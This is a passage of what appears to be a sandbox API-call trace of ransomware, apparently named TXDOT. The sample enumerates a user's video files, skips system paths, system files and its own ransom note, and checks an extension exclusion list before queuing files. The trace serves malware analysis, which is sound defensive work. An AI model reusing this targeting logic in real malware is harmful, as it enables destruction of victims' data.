(lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="cryptolocker") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="ransomware") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="C:\\WINDOWS") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="C:\\Program Files (x86)") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="C:\\Program Files") returned 0x0 [0076.823] GetProcessHeap () returned 0xe30000 [0076.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4fc) returned 0xed6bb8 [0076.823] StrCpyNW (in: psz1=0xed6bb8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0076.823] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\*", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*" [0076.823] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*", lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x140c5800, ftCreationTime.dwHighDateTime=0x1d5e444, ftLastAccessTime.dwLowDateTime=0xb5de8c60, ftLastAccessTime.dwHighDateTime=0x1d5f101, ftLastWriteTime.dwLowDateTime=0xb5de8c60, ftLastWriteTime.dwHighDateTime=0x1d5f101, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2170 [0076.824] StrCmpW (psz1=".", psz2=".") returned 0 [0076.824] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x140c5800, ftCreationTime.dwHighDateTime=0x1d5e444, ftLastAccessTime.dwLowDateTime=0xb5de8c60, ftLastAccessTime.dwHighDateTime=0x1d5f101, ftLastWriteTime.dwLowDateTime=0xb5de8c60, ftLastWriteTime.dwHighDateTime=0x1d5f101, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.824] StrCmpW (psz1="..", psz2=".") returned 1 [0076.824] StrCmpW (psz1="..", psz2="..") returned 0 [0076.824] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8012ea60, ftCreationTime.dwHighDateTime=0x1d5efb5, ftLastAccessTime.dwLowDateTime=0x9eab00a0, ftLastAccessTime.dwHighDateTime=0x1d5f0ed, ftLastWriteTime.dwLowDateTime=0x9eab00a0, ftLastWriteTime.dwHighDateTime=0x1d5f0ed, nFileSizeHigh=0x0, nFileSizeLow=0x4aa7, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="JifxRs4kGA26s8ZB.swf", cAlternateFileName="JIFXRS~1.SWF")) returned 1 [0076.824] StrCmpW (psz1="JifxRs4kGA26s8ZB.swf", psz2=".") returned 1 [0076.824] StrCmpW (psz1="JifxRs4kGA26s8ZB.swf", psz2="..") returned 1 [0076.824] StrCpyNW (in: psz1=0xed6bb8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0076.824] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0076.824] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="JifxRs4kGA26s8ZB.swf", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf" [0076.824] PathFindExtensionW (pszPath="JifxRs4kGA26s8ZB.swf") returned=".swf" [0076.824] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="bootsect.bak") returned 1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="iconcache.db") returned 1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="thumbs.db") returned -1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2=" ransomware ") returned 1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2=" ransom ") returned 1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="debug.txt") returned 1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="boot.ini") returned 1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="desktop.ini") returned 1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="autorun.inf") returned 1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="ntuser.dat") returned -1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="ntldr") returned -1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="ntdetect.com") returned -1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="bootfont.bin") returned 1 [0076.824] StrCmpIW (psz1="JifxRs4kGA26s8ZB.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.824] PathFindExtensionW (pszPath="JifxRs4kGA26s8ZB.swf") returned=".swf" [0076.824] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0076.824] FileTimeToSystemTime (in: lpFileTime=0x552ec3c, lpSystemTime=0x552ec28 | out: lpSystemTime=0x552ec28) returned 1 [0076.825] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552ec28, lpLocalTime=0x552ebf8 | out: lpLocalTime=0x552ebf8) returned 1 [0076.825] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.825] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.825] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf" [0076.825] SetEvent (hEvent=0x3fc) returned 1 [0076.828] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34842840, ftCreationTime.dwHighDateTime=0x1d5f094, ftLastAccessTime.dwLowDateTime=0xa69c2fe0, ftLastAccessTime.dwHighDateTime=0x1d5e25c, ftLastWriteTime.dwLowDateTime=0xa69c2fe0, ftLastWriteTime.dwHighDateTime=0x1d5e25c, nFileSizeHigh=0x0, nFileSizeLow=0xe556, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="smX5XObO64h XQO8UV.avi", cAlternateFileName="SMX5XO~1.AVI")) returned 1 [0076.828] StrCmpW (psz1="smX5XObO64h XQO8UV.avi", psz2=".") returned 1 [0076.829] StrCmpW (psz1="smX5XObO64h XQO8UV.avi", psz2="..") returned 1 [0076.832] StrCpyNW (in: psz1=0xed6bb8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0076.837] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0076.837] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="smX5XObO64h XQO8UV.avi", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi" [0076.837] PathFindExtensionW (pszPath="smX5XObO64h XQO8UV.avi") returned=".avi" [0076.837] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0076.837] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="bootsect.bak") returned 1 [0076.837] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="iconcache.db") returned 1 [0076.837] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="thumbs.db") returned -1 [0076.837] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2=" ransomware ") returned 1 [0076.837] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2=" ransom ") returned 1 [0076.837] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="debug.txt") returned 1 [0076.837] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="boot.ini") returned 1 [0076.838] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="desktop.ini") returned 1 [0076.838] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="autorun.inf") returned 1 [0076.838] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="ntuser.dat") returned 1 [0076.838] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="ntldr") returned 1 [0076.838] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="ntdetect.com") returned 1 [0076.838] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="bootfont.bin") returned 1 [0076.838] StrCmpIW (psz1="smX5XObO64h XQO8UV.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.838] PathFindExtensionW (pszPath="smX5XObO64h XQO8UV.avi") returned=".avi" [0076.838] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0076.838] FileTimeToSystemTime (in: lpFileTime=0x552ec3c, lpSystemTime=0x552ec28 | out: lpSystemTime=0x552ec28) returned 1 [0076.838] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552ec28, lpLocalTime=0x552ebf8 | out: lpLocalTime=0x552ebf8) returned 1 [0076.838] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.838] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.838] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi" [0076.838] SetEvent (hEvent=0x3fc) returned 1 [0076.842] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e2e620, ftCreationTime.dwHighDateTime=0x1d5ef5d, ftLastAccessTime.dwLowDateTime=0x9f718290, ftLastAccessTime.dwHighDateTime=0x1d5f0b9, ftLastWriteTime.dwLowDateTime=0x9f718290, ftLastWriteTime.dwHighDateTime=0x1d5f0b9, nFileSizeHigh=0x0, nFileSizeLow=0x1d4f, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="vH3psvYnWA.swf", cAlternateFileName="VH3PSV~1.SWF")) returned 1 [0076.842] StrCmpW (psz1="vH3psvYnWA.swf", psz2=".") returned 1 [0076.842] StrCmpW (psz1="vH3psvYnWA.swf", psz2="..") returned 1 [0076.842] StrCpyNW (in: psz1=0xed6bb8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0076.842] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0076.842] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="vH3psvYnWA.swf", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf" [0076.842] PathFindExtensionW (pszPath="vH3psvYnWA.swf") returned=".swf" [0076.843] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0076.844] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="bootsect.bak") returned 1 [0076.844] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="iconcache.db") returned 1 [0076.844] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="thumbs.db") returned 1 [0076.844] StrCmpIW (psz1="vH3psvYnWA.swf", psz2=" ransomware ") returned 1 [0076.844] StrCmpIW (psz1="vH3psvYnWA.swf", psz2=" ransom ") returned 1 [0076.845] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="debug.txt") returned 1 [0076.845] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="boot.ini") returned 1 [0076.851] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="desktop.ini") returned 1 [0076.851] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="autorun.inf") returned 1 [0076.851] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="ntuser.dat") returned 1 [0076.851] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="ntldr") returned 1 [0076.852] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="ntdetect.com") returned 1 [0076.852] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="bootfont.bin") returned 1 [0076.852] StrCmpIW (psz1="vH3psvYnWA.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.852] PathFindExtensionW (pszPath="vH3psvYnWA.swf") returned=".swf" [0076.852] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0076.852] FileTimeToSystemTime (in: lpFileTime=0x552ec3c, lpSystemTime=0x552ec28 | out: lpSystemTime=0x552ec28) returned 1 [0076.852] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552ec28, lpLocalTime=0x552ebf8 | out: lpLocalTime=0x552ebf8) returned 1 [0076.852] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.852] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.852] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf" [0076.852] SetEvent (hEvent=0x3fc) returned 1 [0076.859] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e2e620, ftCreationTime.dwHighDateTime=0x1d5ef5d, ftLastAccessTime.dwLowDateTime=0x9f718290, ftLastAccessTime.dwHighDateTime=0x1d5f0b9, ftLastWriteTime.dwLowDateTime=0x9f718290, ftLastWriteTime.dwHighDateTime=0x1d5f0b9, nFileSizeHigh=0x0, nFileSizeLow=0x1d4f, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="vH3psvYnWA.swf", cAlternateFileName="VH3PSV~1.SWF")) returned 0 [0076.859] FindClose (in: hFindFile=0xec2170 | out: hFindFile=0xec2170) returned 1 [0076.859] GetProcessHeap () returned 0xe30000 [0076.859] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed6bb8 | out: hHeap=0xe30000) returned 1 [0076.859] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7319f60, ftCreationTime.dwHighDateTime=0x1d5e637, ftLastAccessTime.dwLowDateTime=0xdafb33b0, ftLastAccessTime.dwHighDateTime=0x1d5ef47, ftLastWriteTime.dwLowDateTime=0xdafb33b0, ftLastWriteTime.dwHighDateTime=0x1d5ef47, nFileSizeHigh=0x0, nFileSizeLow=0x134ed, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="0qq-2JELVv.avi", cAlternateFileName="0QQ-2J~1.AVI")) returned 1 [0076.859] StrCmpW (psz1="0qq-2JELVv.avi", psz2=".") returned 1 [0076.859] StrCmpW (psz1="0qq-2JELVv.avi", psz2="..") returned 1 [0076.859] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.859] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0076.859] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="0qq-2JELVv.avi", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi" [0076.859] PathFindExtensionW (pszPath="0qq-2JELVv.avi") returned=".avi" [0076.859] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0076.859] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="bootsect.bak") returned -1 [0076.859] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="iconcache.db") returned -1 [0076.859] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="thumbs.db") returned -1 [0076.859] StrCmpIW (psz1="0qq-2JELVv.avi", psz2=" ransomware ") returned 1 [0076.859] StrCmpIW (psz1="0qq-2JELVv.avi", psz2=" ransom ") returned 1 [0076.860] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="debug.txt") returned -1 [0076.860] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="boot.ini") returned -1 [0076.860] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="desktop.ini") returned -1 [0076.860] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="autorun.inf") returned -1 [0076.860] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="ntuser.dat") returned -1 [0076.860] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="ntldr") returned -1 [0076.860] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="ntdetect.com") returned -1 [0076.860] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="bootfont.bin") returned -1 [0076.860] StrCmpIW (psz1="0qq-2JELVv.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.860] PathFindExtensionW (pszPath="0qq-2JELVv.avi") returned=".avi" [0076.860] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0076.860] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.860] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.860] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.860] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.860] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi" [0076.860] SetEvent (hEvent=0x3fc) returned 1 [0076.926] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfee27b90, ftCreationTime.dwHighDateTime=0x1d5edca, ftLastAccessTime.dwLowDateTime=0x76781420, ftLastAccessTime.dwHighDateTime=0x1d5ecbe, ftLastWriteTime.dwLowDateTime=0x76781420, ftLastWriteTime.dwHighDateTime=0x1d5ecbe, nFileSizeHigh=0x0, nFileSizeLow=0xdbf4, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="fR4 C.mp4", cAlternateFileName="FR4C~1.MP4")) returned 1 [0076.926] StrCmpW (psz1="fR4 C.mp4", psz2=".") returned 1 [0076.926] StrCmpW (psz1="fR4 C.mp4", psz2="..") returned 1 [0076.926] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.926] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0076.926] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="fR4 C.mp4", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4" [0076.926] PathFindExtensionW (pszPath="fR4 C.mp4") returned=".mp4" [0076.926] StrCmpW (psz1=".mp4", psz2=".txd0t") returned -1 [0076.926] StrCmpIW (psz1="fR4 C.mp4", psz2="bootsect.bak") returned 1 [0076.926] StrCmpIW (psz1="fR4 C.mp4", psz2="iconcache.db") returned -1 [0076.926] StrCmpIW (psz1="fR4 C.mp4", psz2="thumbs.db") returned -1 [0076.926] StrCmpIW (psz1="fR4 C.mp4", psz2=" ransomware ") returned 1 [0076.926] StrCmpIW (psz1="fR4 C.mp4", psz2=" ransom ") returned 1 [0076.926] StrCmpIW (psz1="fR4 C.mp4", psz2="debug.txt") returned 1 [0076.927] StrCmpIW (psz1="fR4 C.mp4", psz2="boot.ini") returned 1 [0076.927] StrCmpIW (psz1="fR4 C.mp4", psz2="desktop.ini") returned 1 [0076.927] StrCmpIW (psz1="fR4 C.mp4", psz2="autorun.inf") returned 1 [0076.927] StrCmpIW (psz1="fR4 C.mp4", psz2="ntuser.dat") returned -1 [0076.927] StrCmpIW (psz1="fR4 C.mp4", psz2="ntldr") returned -1 [0076.927] StrCmpIW (psz1="fR4 C.mp4", psz2="ntdetect.com") returned -1 [0076.927] StrCmpIW (psz1="fR4 C.mp4", psz2="bootfont.bin") returned 1 [0076.927] StrCmpIW (psz1="fR4 C.mp4", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.927] PathFindExtensionW (pszPath="fR4 C.mp4") returned=".mp4" [0076.927] StrStrIW 